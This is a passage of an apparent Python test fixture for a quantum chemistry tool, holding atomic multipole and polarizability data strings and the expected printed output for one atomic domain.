1 1.481 0.000 -0.349 0.352 -0.153 0.000 0.127 -0.132 -0.000 -0.250 -0.445 0.000 -0.261 1.576
"""
PA22 = """AU
3 2 2 1
1 0.000 0.000 0.698 -0.703 -0.000 0.000 -0.284 -3.293 0.000 -0.000 -4.543 -0.000 -4.005 3.875 -0.000 -0.000 3.000 -0.000 3.524
1 -1.481 0.000 -0.349 0.352 0.153 0.000 0.127 -0.132 0.000 0.250 -0.445 0.000 -0.261 2.156 -0.000 1.106 1.051 -0.000 1.520
1 1.481 0.000 -0.349 0.352 -0.153 0.000 0.127 -0.132 -0.000 -0.250 -0.445 0.000 -0.261 2.156 -0.000 -1.106 1.051 -0.000 1.520
"""
OUTPUT_n0_1 = """\
---------------
Atomic domain 1
---------------
Domain center: 0.00000 0.00000 0.69801
"""
OUTPUT_00_1 = OUTPUT_n0_1 + """\
Nuclear charge: 8.00000
Electronic charge: -8.70344
Total charge: -0.70344
"""
OUTPUT_10_1 = OUTPUT_00_1 + """\
Electronic dipole -0.00000 0.00000 -0.28357
"""
OUTPUT_20_1 = OUTPUT_10_1 + """\
Electronic quadrupole -3.29254 0.00000 -0.00000 -4.54317 0.00000 -4.00466
"""
OUTPUT_01_1 = OUTPUT_00_1 + """\
Isotropic polarizablity (w=0) 3.46639
"""
OUTPUT_02_1 = OUTPUT_00_1 + """\
Electronic polarizability (w=0) 3.87468 -0.00000 3.00027 -0.00000 -0.00000 3.52422
"""
| gpl-3.0 | 7,379,008,257,670,152,000 | 48.484848 | 191 | 0.56513 | false |